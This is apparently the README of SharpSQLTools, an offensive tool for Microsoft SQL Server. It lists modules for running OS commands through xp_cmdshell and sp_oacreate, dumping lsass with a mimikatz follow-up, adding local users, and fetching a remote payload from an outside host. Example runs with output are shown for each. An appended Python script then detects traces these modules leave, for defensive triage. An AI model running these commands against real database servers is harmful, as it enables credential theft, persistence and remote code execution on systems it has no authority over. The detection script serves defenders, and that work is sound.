SharpSQLTools is a small tool, written together with @RcoIl, that can upload and download files, execute commands with output echo through xp_cmdshell and sp_oacreate, and load CLR assemblies to perform the corresponding operations.
Introduction
Written together with RcoIl, the tool can upload and download files, execute commands with output echo through both xp_cmdshell and sp_oacreate, and load CLR assemblies to perform the corresponding operations. The feature set follows mssqlproxy. Because we have not worked out how to obtain the underlying socket of the SQL connection from C#, the mssqlproxy function of that project has not been implemented here yet. In addition, CLR is not suitable for some operations involving threads and processes.
The compilation environment is .NET 4.0.
A big shout-out to RcoIl: follow RcoIl and learn C# from the boss!!!
Usage
>SharpSQLTools.exe
_____ _ _____ ____ _ _______ _
/ ____| | / ____|/ __ \| | |__ __| | |
| (___ | |__ __ _ _ __ _ __| (___ | | | | | | | ___ ___ | |___
\___ \| '_ \ / _` | '__| '_ \\___ \| | | | | | |/ _ \ / _ \| / __|
____) | | | | (_| | | | |_) |___) | |__| | |____| | (_) | (_) | \__ \
|_____/|_| |_|\__,_|_| | .__/_____/ \___\_\______|_|\___/ \___/|_|___/
| |
|_|
by Rcoil & Uknow
Usage:
SharpSQLTools target username password - interactive console
SharpSQLTools target username password module command - non-interactive console
Module:
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_oacreate {cmd} - executes cmd using sp_oacreate
enable_ole - you know what it means
disable_ole - you know what it means
upload {local} {remote} - upload a local file to a remote path (OLE required)
download {remote} {local} - download a remote file to a local path
enable_clr - you know what it means
disable_clr - you know what it means
install_clr - create assembly and procedure
uninstall_clr - drop clr
clr_dumplsass - dumplsass by clr
clr_adduser {user} {pass} - add user by clr
clr_download {url} {path} - download file from url by clr
exit
Features
Both an interactive and a non-interactive mode are supported. In interactive mode only the target, user name and password are given on the command line and a console opens; in non-interactive mode the module and its command follow directly after them.
SharpSQLTools target username password - interactive console
SharpSQLTools target username password module command - non-interactive console
Executing a command with xp_cmdshell
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX xp_cmdshell whoami
[*] Database connection is successful!
nt authority\system
Executing a command with sp_oacreate
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX sp_oacreate whoami
[*] Database connection is successful!
[+] c:\windows\system32\cmd.exe /c whoami > C:\Users\Public\Downloads\1611131759069.txt
[+] Reading C:\Users\Public\Downloads\1611131759069.txt
nt authority\system
[+] Deleting C:\Users\Public\Downloads\1611131759069.txt
clr_dumplsass
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_dumplsass
[*] Database connection is successful!
[*] Dumping lsass (488) to C:\Windows\Temp\debug488.out
[+] Dump successful!
[*] Compressing C:\Windows\Temp\debug488.out to C:\Windows\Temp\debug488.bin gzip file
[X] Output file 'C:\Windows\Temp\debug488.bin' already exists, removing
[*] Deleting C:\Windows\Temp\debug488.out
[+] Dumping completed. Rename file to "debug488.gz" to decompress.
[*] Operating System : Windows Server 2008 R2 Standard
[*] Architecture : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch
clr_adduser
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_adduser test1234 1qaz@WSX
[*] Database connection is successful!
[*] Adding User success
[*] Adding Group Member success
clr_download
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_download "http://192.168.28.185:8001/clac.bin" "c:\Users\Public\Downloads\test.bin"
[*] Database connection is successful!
[*] Download success
upload
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX upload C:\Users\Pentest\Desktop\test\usc.exe c:\Users\Public\Downloads\11.exe
[*] Database connection is successful!
[*] Uploading 'C:\Users\Pentest\Desktop\test\usc.exe' to 'c:\Users\Public\Downloads\11.exe'...
[+] 7-1 Upload completed
[+] 7-2 Upload completed
[+] 7-3 Upload completed
[+] 7-4 Upload completed
[+] 7-5 Upload completed
[+] 7-6 Upload completed
[+] 7-7 Upload completed
[+] copy /b c:\Users\Public\Downloads\11.exe_x.config_txt c:\Users\Public\Downloads\11.exe
[+] del c:\Users\Public\Downloads\*.config_txt
[*] 'C:\Users\Pentest\Desktop\test\usc.exe' Upload completed
download
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX download c:\Users\Public\Downloads\t.txt C:\Users\Pentest\Desktop\test\t.txt
[*] Database connection is successful!
[*] Downloading 'c:\Users\Public\Downloads\t.txt' to 'C:\Users\Pentest\Desktop\test\t.txt'...
[*] 'c:\Users\Public\Downloads\t.txt' Download completed
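The modules above leave two kinds of traces a defender can check for: sp_configure writes a line to the SQL Server ERRORLOG whenever `xp_cmdshell`, `Ole Automation Procedures` or `clr enabled` is switched on (the enable_xp_cmdshell, enable_ole and enable_clr modules), and every command executed this way appears in process-creation telemetry as a shell whose parent is sqlservr.exe, carrying the output redirect to a numeric `.txt` under `C:\Users\Public\Downloads` shown in the sp_oacreate output and the `.config_txt` chunk files shown in the upload output. The following triage script is an added example and is not part of SharpSQLTools; the ERRORLOG message format is SQL Server's own, while every timestamp, spid, path and process record in it is constructed for the example, and the SQL Server install path is an assumed placeholder.

```python
"""Triage of traces left by MSSQL command-execution tooling (added example,
not part of SharpSQLTools). Two signal sources are checked:
  1. ERRORLOG lines sp_configure writes when 'xp_cmdshell',
     'Ole Automation Procedures' or 'clr enabled' are switched on.
  2. Process-creation records (Sysmon event 1 / Windows 4688 style fields)
     in which sqlservr.exe spawns a shell, tagged with the temp-file patterns
     visible in the sp_oacreate and upload output above.
All sample lines, paths and events below are constructed for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Message format sp_configure writes to the ERRORLOG on every option change.
CONFIG_RE = re.compile(
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)"
)
# Options the modules in this README depend on, with a triage severity.
SENSITIVE_OPTIONS = {
    "xp_cmdshell": "high",                # xp_cmdshell module
    "ole automation procedures": "high",  # sp_oacreate and upload modules
    "clr enabled": "high",                # install_clr / clr_* modules
    "show advanced options": "low",       # prerequisite for the three above
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Output redirected to a numeric .txt under Public\Downloads (sp_oacreate echo).
OACREATE_ECHO_RE = re.compile(r">\s*\S*\\Users\\Public\\Downloads\\\d+\.txt", re.I)
# Chunk files reassembled with "copy /b" and removed with "del" (upload module).
CHUNK_RE = re.compile(r"\.config_txt\b", re.I)


@dataclass
class Finding:
    source: str    # "errorlog" or "process"
    severity: str  # "high" or "low"
    detail: str


def parse_config_changes(errorlog: str) -> list[tuple[str, int, int]]:
    """Return (option, old, new) for every sp_configure change line."""
    changes = []
    for line in errorlog.splitlines():
        m = CONFIG_RE.search(line)
        if m:
            changes.append((m.group("opt").lower(), int(m.group("old")), int(m.group("new"))))
    return changes


def flag_config_changes(errorlog: str) -> list[Finding]:
    """Flag a sensitive option being switched on (0 -> non-zero); ignore disables."""
    findings = []
    for opt, old, new in parse_config_changes(errorlog):
        sev = SENSITIVE_OPTIONS.get(opt)
        if sev and old == 0 and new != 0:
            findings.append(Finding("errorlog", sev, f"'{opt}' enabled ({old} -> {new})"))
    return findings


def flag_process_events(events: list[dict]) -> list[Finding]:
    """Flag shells whose parent is sqlservr.exe and annotate known tool patterns."""
    findings = []
    for ev in events:
        parent = PureWindowsPath(ev["parent"]).name.lower()
        image = PureWindowsPath(ev["image"]).name.lower()
        if parent != "sqlservr.exe" or image not in SHELLS:
            continue  # shells started elsewhere are out of scope here
        tags = []
        if OACREATE_ECHO_RE.search(ev["cmdline"]):
            tags.append("sp_oacreate-style output redirect")
        if CHUNK_RE.search(ev["cmdline"]):
            tags.append("chunked-upload reassembly/cleanup")
        detail = f"{image} spawned by sqlservr.exe: {ev['cmdline']}"
        if tags:
            detail += " [" + "; ".join(tags) + "]"
        findings.append(Finding("process", "high", detail))
    return findings


# --- constructed sample data (timestamps, spids and paths are made up) ---------
SAMPLE_ERRORLOG = """\
2021-01-20 16:35:58.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-01-20 16:35:58.14 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-01-20 16:36:10.01 spid55      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-01-20 16:36:40.77 spid55      Configuration option 'clr enabled' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-01-20 16:40:02.30 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2021-01-20 16:41:00.00 spid12      Configuration option 'max server memory (MB)' changed from 2048 to 4096. Run the RECONFIGURE statement to install.
"""

_SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"  # assumed install path
_CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_PROCESS_EVENTS = [
    {"parent": _SQLSERVR, "image": _CMD,
     "cmdline": r"c:\windows\system32\cmd.exe /c whoami > C:\Users\Public\Downloads\1611131759069.txt"},
    {"parent": _SQLSERVR, "image": _CMD,
     "cmdline": r'"cmd.exe" /c copy /b c:\Users\Public\Downloads\11.exe_x.config_txt c:\Users\Public\Downloads\11.exe'},
    {"parent": _SQLSERVR, "image": _CMD,
     "cmdline": r'"cmd.exe" /c del c:\Users\Public\Downloads\*.config_txt'},
    {"parent": r"C:\Windows\explorer.exe", "image": _CMD,
     "cmdline": r"cmd.exe /c whoami > C:\temp\out.txt"},  # not spawned by SQL Server: ignored
]

if __name__ == "__main__":
    for f in flag_config_changes(SAMPLE_ERRORLOG) + flag_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"[{f.severity:>4}] {f.source}: {f.detail}")
```

Two caveats when using this for real. The ERRORLOG line only appears at the moment an option changes, so an instance that was left with `xp_cmdshell` or `clr enabled` on long ago produces no new line; pair the log check with a query of the current values in `sys.configurations`. And sqlservr.exe spawning cmd.exe is not malicious by itself, since SQL Agent jobs and maintenance scripts use xp_cmdshell too, which is why the script keeps the shell-from-sqlservr finding generic and adds the Public\Downloads redirect and `.config_txt` tags as the stronger indicators.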